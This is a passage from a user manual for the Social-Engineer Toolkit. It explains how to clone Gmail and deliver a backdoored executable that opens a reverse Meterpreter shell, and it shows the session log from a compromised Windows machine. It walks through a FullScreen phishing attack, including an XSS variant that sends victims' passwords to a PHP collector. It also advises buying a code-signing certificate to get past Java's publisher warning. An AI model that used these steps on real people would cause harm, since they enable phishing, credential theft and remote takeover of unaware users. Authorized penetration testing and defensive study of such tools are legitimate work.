[*] Starting the payload handler...

In this attack, we’ve set up our scenario to clone https://gmail.com and use the reverse
meterpreter attack vector on port 443. We’ve used the backdoored executable to
hopefully bypass anti-virus and setup Metasploit to handler the reverse connections. If
you wanted to utilize an email with this attack vector you could turn the
config/set_config turn the WEBATTACK_EMAIL=OFF to WEBATTACK_EMAIL=ON.
When you get a victim to click a link or coax him to your website, it will look something
like this:
27

As soon as the victim clicks run, you are presented with a meterpreter shell, and the
victim is redirected back to the original Google site completely unaware that they have
been compromised. Note that Java has updated their applet code to show the
“Publisher” field on the applet as UNKNOWN when self signing. In order to bypass
this, you will need to register a company in your local state, and buy a code signing
certificate in the company name.

[*] Sending stage (748544 bytes) to 172.16.32.131

[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1183) at Thu
Sep 09 10:06:57 -0400 2010

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > shell

Process 2988 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

5 Full Screen Attack Vector

FullScreen Attack by: d4rk0 -> Twitter: @d4rk0s

Attack Description:
28

The full-screen attack utilizes the trust in the web browser by using the introduced
FullScreen API available in Firefox, Chrome and Safari. ( Windows , Mac or Linux )

The FullScreen attack module comes available with just two FullScreen Attack options.
Getting the user to click on a crafted link with spoofed browser tooltip text when the
user rolls over the link making them believe it's really https://www.gmail.com . When
clicked a script detects which type of browser the user is running and deploys images
to match the browser ( including OS ) . Displaying a fake page and asking for user
passwords or other important information.

Full-Screen Main Menu:

The main menu displays three options the first to generate an original FullScreen attack
on it's own separate page. The second option is crafting the full-screen attack into a
usable XSS ( Cross site scripting ) set of files ready to be deployed. And of course the
last option will take you back to SETs previous menu.

First Option:

First option will display two available Full-Screen Attacks Picking one or the other will
result in several prompts asking you information based on how you would
like your FullScreen Attack page created for field deployment. Currently the two
Generated attacks
are GMAIL and FACEBOOK. PHP must be enabled on your server for additional
information gathering
techniques to work. It will ask if you have a local server running? A simple Yes or no
will lead you to either
storing the generated files locally on disk or locally within your running web server. The
next question will ask
about relaying the victims information after the attack has been established and
finalized. The information can either be saved locally on disk or be mailed to you. ( If
you pick mail please make sure PHPs mail features are setup and running. )
Entering an Email address or answering if you would like a Random File name
generated for each new submission is then asked. Obviously picking No to random
files will have you enter a file name where all results will be stored on disk. The next
question will ask if you would like to gather a more in-depth information gathering
profile for each victim, this includes things such as GEOIP, ISP, USER AGENT etc..
Other various questions will be asked hitting enter will keep the default answer for each
situation. There is also a brief description of each function and what it does also. Make
sure SET has proper read + write priv set so it can create all of the newly generated
files. Success messages will be displayed after everything has been created. [ 1 PHP
File , js Folder , img Folder , css Folder ] The php file will depend on the name you
assigned it during configuration the default is index.php. * DO NOT RE NAME ANY
FOLDERS OR FILES WITHIN FOLDERS *
29

Second Option:

The second option is for XSS deployment and my favorite. This ends up creating all
folders and simply linking to your header.js file (http://yoursite/header.js) in your XSS
payload will display the FullScreen attack file embedded within whatever site you have
ethically found and are exploiting an XSS within. This also requires PHP be present on
your attacking server because a PHP file will be there listening for incoming form
submissions. The XSS vuln should be able to run JavaScript for this attack to work
properly. Currently there is only one XSS Full-Screen generation option available,
which is Facebook. More options and methods will be added in the future.

The First question after selecting this attack is to specify the absolute path of where
you are keeping all the folders and files. ( Ex: http://mysite.net/FullScreenfolder ) This
needs to be specific so all the images and files can all have an absolute path so they
are displayed during the XSS attack. All other questions will be straightforward and
explained with a brief description of what it does. Last you will pick a spot where to
upload all of the generated files for the attack. There will be one PHP file called
varGrab.php that will sit on your backend server listening to incoming data. (The data is
transferred using various JavaScript methods ) The others are folders created [js, img,
css ] . The JavaScript file that you want to link during your XSS payload is [
http://yoursite.com/js/header.js ] ( in the js folder )

* DO NOT CHANGE FOLDER OR FILE NAMES UNLESS YOU ARE REALLY DIVING
INTO THINGS *

6 Metasploit Browser Exploit Method

The Metasploit Browser Exploit Method will import Metasploit client-side exploits with
the ability to clone the website and utilize browser-based exploits. Let’s take a quick
look on exploiting a browser exploit through SET.

Select from the menu:

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
30

8) Wireless Access Point Attack Vector

9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

set> 2

The Web Attack module is a unique way of utilizing multiple web-based attack in
order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit

browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web-

site that has a username and password field and harvest all the
information posted to the website.

The TabNabbing method will wait for a user to move to a different

tab, then refresh the page to something different.

The Web-Jacking Attack method was introduced by white_sheep, Emgent

and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web
attack menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing all at once to see which is successful.

1) Java Applet Attack Method

2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method